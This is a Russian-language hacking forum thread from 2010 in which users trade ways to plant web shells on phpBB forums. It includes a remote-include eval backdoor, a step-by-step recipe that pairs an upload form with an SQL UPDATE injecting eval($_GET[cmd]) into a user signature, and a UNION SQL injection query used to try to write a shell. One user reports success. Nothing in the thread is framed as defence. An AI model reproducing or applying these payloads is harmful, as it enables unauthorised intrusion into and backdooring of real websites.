ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #13001  
Старый 08.05.2010, 19:27
daniel_1024
Участник форума
Регистрация: 15.07.2009
Сообщений: 158
Провел на форуме:
698831

Репутация: 34
По умолчанию

как вариант можно попробовать впихнуть код через восстановление базы данных в форуме:
eval(file_get_contents($_GET['e']));
а потом обращаться
http://site.com/images/sh.php?e=http://адресс_до_шела

З.Ы или как Ctacok посоветовал, это проще)

Последний раз редактировалось daniel_1024; 08.05.2010 в 19:58..
 
Ответить с цитированием

  #13002  
Старый 08.05.2010, 19:38
GOGA075
Участник форума
Регистрация: 30.03.2008
Сообщений: 208
Провел на форуме:
869744

Репутация: 18
По умолчанию

И как же этот код на сервер запихнуть?
 
Ответить с цитированием

  #13003  
Старый 08.05.2010, 19:40
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094

Репутация: 672


Отправить сообщение для Konqi с помощью ICQ
По умолчанию

GOGA075

с текстом тоже самое
 
Ответить с цитированием

  #13004  
Старый 08.05.2010, 19:46
GOGA075
Участник форума
Регистрация: 30.03.2008
Сообщений: 208
Провел на форуме:
869744

Репутация: 18
По умолчанию

Ну тут 2 варианта.
Либо что то нетак сделал, либо админ сервера закрыл урлы в cmd!
 
Ответить с цитированием

  #13005  
Старый 08.05.2010, 19:51
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094

Репутация: 672


Отправить сообщение для Konqi с помощью ICQ
По умолчанию

я ни так хорошо понял версию Ctacok

куда нужно ставить эту форму аплоада ??
 
Ответить с цитированием

  #13006  
Старый 08.05.2010, 20:02
GOGA075
Участник форума
Регистрация: 30.03.2008
Сообщений: 208
Провел на форуме:
869744

Репутация: 18
По умолчанию

Konqi попробуй через иклуид!
 
Ответить с цитированием

  #13007  
Старый 08.05.2010, 20:07
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094

Репутация: 672


Отправить сообщение для Konqi с помощью ICQ
По умолчанию

GOGA075 ты Эйнштейн.

как можно было забыть такое!!

shell загрузилось без каких либо проблем
 
Ответить с цитированием

  #13008  
Старый 08.05.2010, 20:13
.:[melkiy]:.
Постоянный
Регистрация: 25.01.2009
Сообщений: 368
Провел на форуме:
5290740

Репутация: 912
По умолчанию

Цитата:
Сообщение от Konqi  
я ни так хорошо понял версию Ctacok

куда нужно ставить эту форму аплоада ??

1. создаёшь у себя на компе 1.html
2. засовываешь туда
Код HTML:
      <form action="http://your_site.ru/forum/profile.php?mode=editprofile&cmd=copy($_FILES[file][tmp_name], $_GET[bob]);&bob=/home/z/u/zucchini/public_html/forum/images/avatars/htaccess.php
" method="post" enctype="multipart/form-data">
<input type="file" name="file">
<input type="submit" value="upload">
</form>
3. создаёшь 1.sql
4. суёшь туда
PHP код:
      UPDATE phpbb_users SET user_sig_bbcode_uid='(.+)/e\0'user_sig='phpbb:eval($_GET[cmd])' WHERE username='USERNAME'
5. открываешь через браузер 1.html
6. выбираешь шелл
7. жмёшь upload
8. проверяешь, http://your_site.ru/forum/images/avatars/htaccess.php

так ясно? %)
 
Ответить с цитированием

  #13009  
Старый 08.05.2010, 20:13
GOGA075
Участник форума
Регистрация: 30.03.2008
Сообщений: 208
Провел на форуме:
869744

Репутация: 18
По умолчанию

А может кто подскажет как через phpmyadmin сделать админом любого юзера форума phpbb3!
 
Ответить с цитированием

  #13010  
Старый 08.05.2010, 20:55
olishort
Участник форума
Регистрация: 13.04.2009
Сообщений: 121
Провел на форуме:
436858

Репутация: 33
По умолчанию

Ребят, помогите залить шелл через двойной запрос.
Не могу залить т.к magic_quotes = on

?uid=-93+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14+f rom+mysql.user--

выводится 2 и 8. file_priv = Y

Почитал https://forum.antichat.ru/showpost.php?p=663815&postcount=39... не получается
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Форумы 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ